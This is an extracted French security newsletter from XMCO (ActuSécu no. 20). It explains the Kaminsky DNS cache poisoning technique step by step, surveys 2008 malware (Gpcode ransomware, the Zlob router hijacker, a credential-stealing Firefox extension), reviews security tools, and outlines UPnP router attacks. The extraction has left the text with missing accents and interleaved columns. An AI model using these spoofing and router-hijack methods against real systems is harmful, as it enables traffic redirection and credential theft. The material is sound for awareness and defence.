ports sources UDP utiliss sont simplement
incrments sur la majorit des systmes voire fixs 3 - Le pirate envoie massivement des fausses rponses
la valeur "53". au serveur du FAI en se faisant passer pour le DNS de
Un pirate est donc en mesure de prdire l'identifiant et Google. Le pirate devine lID utilis par le DNS du FAI
d'envoyer des rponses DNS falsifies. Cette (cest la faille).
vulnrabilit peut tre exploite afin de mener une
attaque nomme 'DNS Cache Poisonning'. Ce type 4 - Le serveur du FAI accepte la fausse rponse du
d'attaque permet au pirate de rpondre avant le pirate, lenregistre dans son cache et rpond
vritable serveur DNS de la victime, afin de rediriger le linternaute en lui indiquant la fausse adresse IP.
trafic rseau vers le serveur de son choix. Afin Linternaute est alors dirig vers un faux site Google. Le
d'optimiser les temps de rponse, les serveurs DNS faux site pourra alors lui proposer de tlcharger des
enregistrent 'en cache' les rponses. L'attaque virus, des bots, des malwares, lenvoyer vers dautres
persistera donc dans le temps au travers du cache du faux sites de commerce en ligne, etc.
serveur.
Ractions des diteurs : randomision de lID et du

port source
Les diteurs ont t avertis avant lalerte. Cela leur a

permis de prparer et de corriger les serveurs DNS.
Tous les serveurs DNS publics configurs pour

accepter "les requtes rcursives" taient (certains le
sont certainement encore) vulnrables.
Tous les serveurs DNS (Sun, Linux, AIX, Cisco,
Juniper...) bass sur le logiciel BIND (named), version 8
et 9 (CVE-2008-1447)
Enfin, les serveurs DNS Microsoft Windows

(MS08-037/CVE-2008-1454), certainement les plus
implments sont galement vulnrables.

LACTU SCU N20
serveur DNS d'autorit qui ne peut rsoudre
Les diteurs, dont Microsoft, augmentent l'entropie, compltement la requte (nom inexistant) et la seconde
c'est--dire l'aspect alatoire, du choix de l'ID DNS. Les du pirate assurant la rsolution complte de la requte
diteurs modifient galement l'entropie dans le choix du demande. Dans le cas o deux rponses lgitimes
port source UDP, qui jusqu'alors tait nulle, afin de sont reues par un serveur DNS, le protocole prvoit
rduire les chances de russites d'une telle attaque. d'utiliser la rponse la plus complte; dans notre
exemple, la rponse spoofe par le pirate. Le protocole
Ainsi, la rception dune rponse dun autre DNS, le prvoit dans ce cas daccorder une grande confiance
serveur resolver vrifiera que lID est bien le mme et au serveur dont la rponse et la plus complte : ici, le
que le port source UDP a t respect. pirate.
Bien sr, nous attendons dassister la BlackHat le 4 Cette concurrence sur la confiance est la base de
aot pour avoir les dtails de cette attaque et lattaque DNS qui a fait la une des mdias dbut juillet.
comprendre comment Dan Kaminsky Deputy Dan
a dcouvert un moyen efficace dexploiter la vieille faille Toutefois, cette attaque n'est pas aussi simple. En effet,
des DNS et comprendre pourquoi les diteurs ont eu si pour que la rponse envoye par le pirate soit traite,
peur. celle-ci doit contenir le mme identifiant DNS (ID)
utilis par la requte rcursive envoye au serveur
Rfrences : d'autorit (cod sur 16 bits soit 1 chance sur 65536). Le
pirate doit donc envoyer de une un maximum de
[ 1 ] h t t p : / / w w w. i s c . o r g / i n d e x . p l ? / s w / b i n d / b i n d - 65536 requtes diffrentes sur le serveur DNS de
security.php "fai.com" (10 minutes), avec des demandes pour
[2] http://www.microsoft.com/france/technet/security/ rsoudre de nombreux noms de domaine
bulletin/ms08-037.mspx INEXISTANTS (inexistant1.xmcopartners.com,
inexistant2.xmco.com..., inexistant65536.xmco.com).
chaque requte, une rponse forge sera envoye
avec un QID incrment.
Ces informations nont pas t confirmes

par Kaminsky et sont donc prendre avec
prcaution...
La mthode de Dan Kaminsky ne s'arrte pas l! En

Quelle est cette nouvelle mthode dcouverte par effet, le pirate peut galement exploiter le champ (ou
Dan Kaminsky? enregistrement) DNS nomm RR : Resource
Records. En insrant un RR additionnel dans la
Suite une fuite d'information (leakage) malheureuse rponse, un pirate pourrait modifier le cache de
(voir http://www.matasano.com/log/1105/regarding-the- manire changer le serveur d'autorit du domaine
post-on-chargen-earlier-today/), certains dtails de vis (dans notre exemple "xmco.com").
cette mthode d'attaque ont t publis. Ces
informations nont pas t confirmes par Kaminsky et Comme la rponse du DNS pirate est considre de
sont donc prendre avec prcaution. confiance car plus complte, le champs RR
additionnel sera pris en compte par le serveur DNS
Notre premire analyse de la faille donnait quelques victime.
pistes sur la vulnrabilit en question et prsentait
lexploitation connue des failles DNS. Nous vous Nous supposons, donc ici pourquoi Microsoft a corrig
proposons ici une nouvelle analyse avec les nouveaux le serveur DNS et le client DNS (le resolver) dans son
dtails publis durant quelques heures Matasano. patch de scurit de juillet.
Toute l'astuce repose sur le fait que l'attaquant

demande un enregistrement volontairement inexistant
aux serveurs DNS de la victime. Par exemple :
L'attaquant demande la rsolution de
"inexistant.xmco.com" au serveur DNS du FAI de la
victime "ns.fai.com". Pendant que le serveur DNS de
"fai.com" ralise une requte rcursive pour rsoudre
ce nom qui n'existe pas, l'attaquant s'empresse
d'envoyer une rponse spoofe. Le serveur DNS
victime va donc recevoir deux rponses : la premire du

LACTU SCU N20
Prenons un exemple concret: (ns.fai.com) de la victime. Ce serveur envoie alors des
requtes rcursives au serveur DNS dautorit du
Rappel sur le fonctionnement DNS: domaine xmco.com (ns.xmco.com).
2)" Le serveur DNS ns.xmco.com rpond en

indiquant que le nom demand est inconnu. La
rponse contient uniquement ladresse du domaine NX
(ladresse de xmco.com) avec lidentifiant contenu dans
la requte.
Le pirate renvoie galement une rponse spoofe

avec un champ RR additionnel malicieux pour
chaque requte envoye en esprant que le ID utilis
soit le mme que celui utilis avec le serveur dautorit
(ns.xmco.com). Seule la rponse forge possdant le
bon ID sera traite.
Lattaque de Dan Kaminsky: tape 2
Une fois que le pirate a lanc les nombreuses requtes

1) "U n u t i l i s a t e u r d e m a n d e l a d r e s s e I P d e DNS et les rponses associes, ce dernier trouve lune
www.xmco.com son serveur DNS (ns.fai.com) des rponses envoyes par le pirate contient le bon ID
DNS (ici 2222).
2)" Le serveur DNS du FAI envoie une requte
rcursive au serveur DNS dautorit (ns.xmco.com) du
domaine xmco.com. Cette requte possde un ID
(identifiant de scurit).
3) "Le serveur dautorit renvoie ladresse IP associe

www.xmco.com au serveur DNS du FAI dans une
rponse DNS contenant le mme ID que la requte.
4) "La rponse est alors renvoye lutilisateur.
Lattaque de Dan Kaminsky: tape 1
1) Le pirate envoie une requte DNS sur le nom de

domaine inexistant inexistant02222.xmco.com au
serveur DNS du FAI (82.82.82.82) WWW.XMCOPARTNERS.COM
2) Le serveur DNS du FAI renvoie la requte au serveur

dautorit de xmco.com (ns.xmco.com) avec le
ID=2222.
3) Le pirate envoie une rponse DNS spoofe avec

lID=2222 et ladresse IP de
inexistant02222.xmco.com . Cette rponse inclut
galement un champ RR afin de mettre jour le cache
du serveur DNS du FAI et de modifier ladresse IP du
"
serveur dautorit de xmco.com par ladresse IP du
1) Un pirate envoie de 1 65536 requtes DNS serveur DNS du pirate.
concernant des noms inconnus
(inexistantXXXX.xmco.com) au serveur DNS du FAI

Le serveur dautorit a galement envoy une rponse
or celle-ci indique que le nom
inexistant02222.xmco.com est inconnue.
Le serveur DNS du FAI va donc recevoir 2 rponses

DNS lgitimes. Toutefois, seule la rponse forge par
le pirate sera prise en compte, car elle rsout
compltement le nom de domaine
inexistant02222.xmco.com.
Linstruction RR remplacera galement le cache du

serveur DNS du FAI. Ainsi, toutes les nouvelles
requtes DNS (*.xmco.com) de tous les clients du
serveur DNS du FAI seront rediriges vers le serveur
DNS du pirate.
Le pirate matrise dsormais le domaine xmco.com:

toutes les rsolutions de noms pour ce domaine seront
transmises au DNS pirate.
Nous reviendrons en dtails sur cette vulnrabilit ds

lors que Dan Kaminsky aura publiquement dvoil les
dtails son attaque et la preuve de concept associe...

LACTU SCU N20
Des virus, toujours des virus...
Le premier vritable virus pour Mac OS X GPcode, un ransomeware coriace

exploite une vulnrabilit du systme
Un nouveau virus de la famille des 'Ransom ware' a
Il est communment admis que les systmes Apple ne fait son apparition au dbut du mois de Juin. Ce dernier,
sont pas sujets aux virus car ceux-ci sont bass sur un variante du virus 'Gpcode' sest peu peu rpandu et a
noyau Unix. Les utilisateurs ne sont donc pas certainement nerv plus dune victime.
Administrateur de leur poste.
En effet, Gpcode est un virus chiffrant les fichiers situs
Cest un fait. Les experts en scurit informatique sur le poste de travail d'un utilisateur infect.
pouvaient cependant mettre une rserve : Oui, tant Tout dabord, le virus recherche sur les disques durs
quil ny a pas dexploit local permettant au virus de locaux la prsence de fichiers aux extensions
passer Administrateur . Cest malheureusement une suivantes .doc, .txt, .pdf, .xls, .jpg, .png, .cpp, .h... Ces
chose temporairement possible avec la dcouverte la derniers sont alors dupliqus. Le premier exemplaire
faille dlvation de privilges prsente ci-dessus. En (document original) est supprim tandis que le second
effet, un nouveau virus vient de faire son apparition, exemplaire devient chiffr avec une cl RSA de 1024
quelques heures aprs la dcouverte de la vulnrabilit. bits et devient donc inutilisable...
Ce dernier baptis AppleScript.THT se matrialise Une fois les fichiers chiffrs, le virus affiche des
sous la forme dun AppleScript compil sous le nom messages d'alerte, incitant l'utilisateur contacter le
ASthtv05 (60KB) permettant au pirate de prendre le pirate afin d'acheter le programme de dchiffrement
contrle total du systme (excution de code, captures (virus appel communment 'Ransom ware'),
dcran avec le logiciel iSight, enregistrement les restaurant les fichiers dans leur tat original.
frappes clavier, vols des mots de passe de lutilisateur
pig, dsactivation des messages systmes).
INFO...
Et Symbian OS ?
Les plateformes mobiles sont galement De plus, le fichier texte suivant est alors cr la racine
victimes de virus. Le dernier en date
de chaque rpertoire :
affecte les plateformes Symbian S60 de
troisime gnration et se matrialise
sous la forme dune archive Jar (lecteur
vido java) 'iSexPlayer.jar'. Cette
dernire, destine visualiser des vidos
pornographiques, est actuellement rpandue
sur Internet.
Une fois installe sur le systme,

l'application incite l'utilisateur Le virus est aujourdhui dtect sous le nom
devenir membre. L'utilisateur acceptant
'Virus.Win32.Gpcode.ak'. Son excution est ainsi
l'invitation ne peut plus lannuler. Il
empche par les antivirus mis jour.
doit alors autoriser l'application
envoyer un SMS surtax de deux euros.
Une fois l'autorisation accorde, le La version prcdente de Gpcode utilisait une cl de
malware effectue l'insu de 660 bits mal implmente et avait t casse par les
l'utilisateur, en moyenne 7 appels chercheurs du laboratoire antiviral Kaspersky. Cette
internationaux par jour. fois-ci, la tche devient nettement plus difficile, car

LACTU SCU N20
limplmentation du chiffrement RSA ne comporte Le virus ZLOB sattaque aux routeurs
aucun problme.
Le virus Zlob [1] plus connu sur le nom de
Une solution de contournement a t trouve par les DNSChanger a galement t mis jour.
quipes du laboratoire Kasperski et consiste utiliser
un logiciel permettant de rcuprer les fichiers Ce virus, dvelopp en 2006, permet de modifier les
supprims. configurations des serveurs DNS. Le Domain Name
System (DNS) est un systme permettant d'tablir une
correspondance entre une adresse IP et un nom de
domaine.
Le virus tente de contaminer les routeurs en testant un

certain nombre de comptes par dfaut (Linksys,
Cisco, Netgear, ...) sur les accs telnet, SSH...
La liste de ces identifiants par dfaut est constitue de
761 combinaisons.
Kaspersky a donc dvelopp un logiciel nomm
StopGpcode, bas le projet Open Source PhotoRec de

Christophe Grenier de la socit cgsecurity.
Rfrences :
[1] http://www.cgsecurity.org/wiki/Main_Page
[2] http://www.f-secure.com/v-descs/gpcode.shtml
INFO...
Firefox et les extensions caches
Les extensions Firefox se composent d'un

fichier .xpi permettant leur
installation. Celles-ci permettent
d'ajouter de nouvelles fonctionnalits
au navigateur (voir Actu-Secu n19).
Cependant, ces extensions sont dotes de
privilges levs (envoi de requtes
AJAX sur d'autres domaines que celui
visit, interaction avec les composants
du navigateur ...).
Les malwares sont friands de ces Une fois install sur l'quipement infect, le virus tente
extensions permettant notamment le vol de changer la configuration DNS du routeur.
d'identifiants et de comptes
bancaires ...L'extension 'FFsniFF' [3]
Grce cette manipulation, les pirates peuvent ainsi

en est l'exemple. Cette dernire permet,
rediriger leurs victimes sur des sites de leur choix.
la soumission de chaque formulaire
contenant un mot de passe, d'envoyer par En effet, lorsqu'un utilisateur demande de visiter le site
mail un pirate, le contenu du www.xmcopartners.com par exemple, les serveurs DNS
formulaire. retournent l'IP 91.121.7.172 .
En modifiant la configuration DNS statique, les pirates
Une fois installe, cette extension peuvent alors spcifier d'associer le site xmcopartners
n'apparait pas dans le gestionnaire vers l'IP de leur serveur pirate.
d'extension. L'utilisateur est alors
dup, ne pouvant dsinstaller cette Les premires versions du virus se contentaient de
extension. modifier le fichier 'C:/WINDOWS/system32/drivers/etc/
hosts' sur le poste infect. Ce fichier se comporte
comme un serveur DNS, il fait la correspondance entre
les adresses IP et les noms de domaines.

LACTU SCU N20
En s'attaquant directement au routeur, le virus peut
compromettre tous les utilisateurs du rseau.
Des attaques de Phishing peuvent tre menes grce

ce procd (redirection vers des faux sites : banques,
ebay...) afin de voler des comptes, ou des donnes
confidentielles.
Afin dviter toute contamination, nous vous conseillons

de respecter les quelques rgles de base savoir :
Changer le mot de passe par dfaut de votre routeur

en utilisant un mot de passe solide (caractres
spciaux, nombres, majuscules, minuscules
Configurer votre routeur afin dautoriser uniquement
certaines adresses IP accder linterface
dadministration
Maintenez jour votre firmware.
Dsactiver UPnP ( ;-)
Rfrences :
http://extremesecurity.blogspot.com/2008/06/use-
default-password-get-hijacked.html

LACTU SCU N20
OUTILS LIBRES Liste des outils bien utiles
Chaque mois, nous vous

prsentons, dans cette
rubrique, les outils libres
qui nous paraissent utiles et
pratiques.
Ces utilitaires ne sont en

aucun cas un gage de scurit
et peuvent galement tre un
vecteur dattaque.
Nous cherchons simplement

vous faire part des logiciels
gratuits qui pourraient
faciliter votre travail ou
lutilisation quotidienne de
votre ordinateur.
Ce mois-ci, nous prsenterons

plusieurs logiciels Scurit :
coffre-fort lectronique et
deux outils pour les
administrateurs...
XMCO | Partners
Aprs avoir prsent quelques extensions Firefox (de retour le

mois prochain), nous nous sommes intresss aux logiciels de
chiffrements (gestionnaire de mots de passe et de partition),
capables de stocker des mots de passe ou informations sensibles
de manire scurise.
Nous prsenterons donc trois logiciels de ce type (Windows et

Mac) ainsi que deux logiciels pratiques.
Flying Bit Password Keeper

KeePass

TrueCrypt
AxBan : un tueur dActive X

LACTU SCU N20
Flyingbit
Gestionnaire dinformations sensibles
Utilit
Type Scurit
Systme dexploitation Windows
Description Comme chacun a pu en faire lexprience, rester secure demande
une mmoire dlphant. Les dizaines de comptes (login rseau,
email, serveur, machines personnelles, compte en banque, FTP,
SSH...) doivent tre unique pour viter tout vol dinformation.
Le POST-IT est devenu au fils des annes, le moyen le plus utilis
en entreprise pour y crire ses mots de passe mais
malheureusement le mois scuris de tous.
Des logiciels permettent donc de grer la scurit du stockage de

vos informations sensibles. Flyingbit est lun dentre eux et remplit
parfaitement sa mission. Un seul mot de passe est dsormais
ncessaire pour accder lensemble de ses mots de passe
stocks dans une base de donnes chiffre.
Capture dcran
Tlchargement Flyingbit est disponible ladresse suivante :

http://www.flyingbit.com/downloads/
Avis XMCO Flyingbit est un des logiciels du march capable de rpondre aux
besoins de stockage dinformations sensibles. Dote dun interface
simple, ce dernier deviendra rapidement votre compagnon prfr.

LACTU SCU N20
KeePass
Gestionnaire dinformations sensibles
Utilit
Type Scurit
Systme dexploitation Windows/Linux/Mac OS X/Blackberry/PalmOS/Symbian...
Description Toujours dans le mme genre, un autre outil nomm KeePass
propose exactement les mmes services que loutil prcdent :
classification des informations, gnrateur de mots de passe
solides, copie dans le presse papier, sauvegarde chiffre de la base
de donnes...
Capture dcran
Tlchargement Keepass est disponible ladresse suivante :

http://keepass.info/download.html
Avis XMCO
KeePass est galement un des logiciels libres capable de rpondre
ce type de besoin. De plus, lditeur fournit galement une version
portable, ne ncessitant aucune installation particulire ainsi que
des versions pour quipements mobiles (Symbian OS, PocketPC,
PalmOS, Blackberry...De quoi emmener tous vos mot de passe en
vacances sans le moindre risque!

LACTU SCU N20
TrueCrypt
Logiciel de chiffrement
Utilit
Type Scurit
Systme dexploitation Windows/Linux/Mac OS X...
Description TrueCrypt est un logiciel qui permet de chiffrer la vole chaque
document sauvegard, de faon transparente pour lutilisateur.
Utilisant des algorithmes forts (AES, Triple DES), cet outil se
configure simplement. Il suffit de crer un fichier appel conteneur
qui stockera les fichiers chiffrs. Ce conteneur doit tre affect un
volume qui ne pourra tre accessible quavec un mot de passe entr
dans linterface du logiciel.
Ainsi, lorsque ce volume est dmont , personne ne pourra
accder vos donnes.
Capture dcran
Tlchargement TrueCrypt (6.0a) est disponible sur de nombreuses plateformes

ladresse suivante:
http://www.truecrypt.org/downloads.php
Avis XMCO TrueCrypt est un logiciel pratique. Toutes vos donnes crites sur un
volume cr au pralable sont chiffres de manire transparente.
Les informations sensibles peuvent donc tre gardes et stockes
en toute tranquillit.
Attention toute fois de configurer correctement ce logiciel. Une fois le
mot de passe saisi pour accder la partition chiffre, celui-ci reste
donc accessible par les virus...Prenez donc garde bien fermer la
partition ou de manire automatique aprs un certain temps
dinactivit...

AxBan
Gestion des Kill bit
Utilit
Type Administration
Systme dexploitation
Description Dans une autre catgorie, passons maintenant un utilitaire qui

ravira les administrateurs systme. En effet, les failles de scurit
relatives aux Active X sont lgions, mais les diteurs mettent
souvent quelques jours voire quelques semaines avant de corriger
les problmes.
Afin dempcher les excutions de ces contrles dangereux, il est
possible dajouter une valeur nomme killbit qui bloquera lActive X
en question. Cependant, aucun outil ne permettait jusqu prsent
dajouter un kill bit de manire simple.
AxBan est un logiciel lger capable de bloquer les Active X de votre
choix.
Capture dcran
Tlchargement La dernire version de AxBan est disponible ladresse suivante :

http://portal.erratasec.com/axb/AxBan.exe
Avis XMCO AxBan est un logiciel pratique. Il vous permet de connatre les
Active X installs sur votre machine et de pouvoir les bloquer en
un clic de souris.

LACTU SCU N20
propos de lActuScu
LActuScu est un magazine numrique rdig et dit par les consultants du cabinet de conseil Xmco Partners.
Sa vocation est de fournir des prsentations claires et dtailles sur le thme de la scurit informatique, en toute
indpendance. Il sagit de notre newsletter.
Tous les numros de lActuScu sont tlchargeables ladresse suivante:

http://www.xmcopartners.com/actualite-securite-vulnerabilite-fr.html
propos du cabinet Xmco Partners
Fonds en 2002 par des experts en scurit, dirige par ses fondateurs, nous
n'intervenons que sous forme de projets forfaitaires avec engagement de rsultats.
Les tests d'intrusion, les audits de scurit, la veille en vulnrabilit constituent
nos axes majeurs de dveloppement pour notre cabinet.
Paralllement, nous intervenons auprs de Directions Gnrales dans le cadre de

missions daccompagnement de RSSI, dlaboration de schma directeur ou
encore de sminaires de sensibilisation auprs de plusieurs grands comptes franais.
Contacter le cabinet Xmco Partners
Pour contacter le cabinet Xmco Partners et obtenir des informations sur notre mtier : 01 47 34 68 61.
Notre site web : http://www.xmcopartners.com/


Xmco Actusecu 20 Upnp

Transféré par

Informations du document

Copyright

Formats disponibles

Partager ce document

Partager ou intégrer le document

Options de partage

Avez-vous trouvé ce document utile ?

Ce contenu est-il inapproprié ?

Droits d'auteur :

Formats disponibles

Xmco Actusecu 20 Upnp

Transféré par

Droits d'auteur :

Formats disponibles

LACTUSCU 20 XMCO | PARTNERS

UPNP (PLUG N PLAY)

L act ualit du m ois : l a fai l le S S L , le v ir u s M a c e t l a tta q u e D NS ...

L es logic ie ls du m ois : Flying Bit Password Keeper, Keepass et Axban

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

propos du cabinet Xmco Partners

Pour contacter le cabinet Xmco Partners et dcouvrir nos prestations : http://www.xmcopartners.com/

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

Hacking with UPnP......................................4 Rsume de la SSTIC...................................19

LActualit scurit du mois......................24

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

LES DESSOUS DU Hacking with UPnP

Cependant 9 ans aprs, la

Cet article tentera de

Microsoft dfinit le protocole de la sorte The overall

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

Le protocole IP constitue la base pour les

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

Lorsquun quipement est connect sur un rseau, ce

Une fois la connectivit IP tablie, lquipement UPnP

Chaque quipement (device) Control Point rpondra

Chaque requte contient une entte LOCATION qui

De leur ct, les quipements client (ou Control Point)

Que ce soit au travers dune requte NOTIFY ou en

Ce fichier contient une description de lquipement

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

Fichier de configuration UPnP dune imprimante Eventing :

Par exemple, ds quun routeur va tre reconfigur, un

Nombreux logiciels utiliss du quotidien utilisent sans

Dautres logiciels comme les clients BitTorrent

La dernire tape du protocole va consister lire ce

Muni de toutes ces informations, le client va pouvoir

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

Les auteurs du protocole UPnP ont conu

un protocole, certes pratique, mais

En effet, comment un quipement peut-il tre

Prsence dune imprimante UPnP sur le rseau local

Un nouveau service apparat alors dans la liste des

Service SSDP de Windows

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

Tous les quipements implmentant UPnP

Le risque majeur concerne les particuliers. En

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

Notre routeur propose 3 types de services diffrents.

1er service: Layer3Forwarding:1

Utilisation dun plugin NMAP

Ritrons la mme opration avec loutil UPnPScan sur

Fichier de configuration Public_UPnP_Layer3F.xml

Ce premier service est donc dfini au sein du fichier

Ce dernier propose deux types dactions diffrentes:

Utilisation de loutil UPnPScan 2me service: WANCommonInterfaceConfig:1

Mmes rsultats, nous obtenons galement

Fichier de configuration Public_UPnP_WAND.xml

(Dbit, informations diverses sur la ligne ADSL)

Fichier de configuration Public_UPnP_WANIPConn.xml

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

Entte de la requte envoye au routeur

Actions disponibles Paramtre de la requte POST (sans retour la ligne lors de

Lenvoi dune requte malicieuse

Passons arbitrairement prsent la phase principale

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

UPnP est donc un protocole dangereux. Labsence de

Les routeurs ADSL sont au centre du problme, car la

Automatisation de lattaque Webographie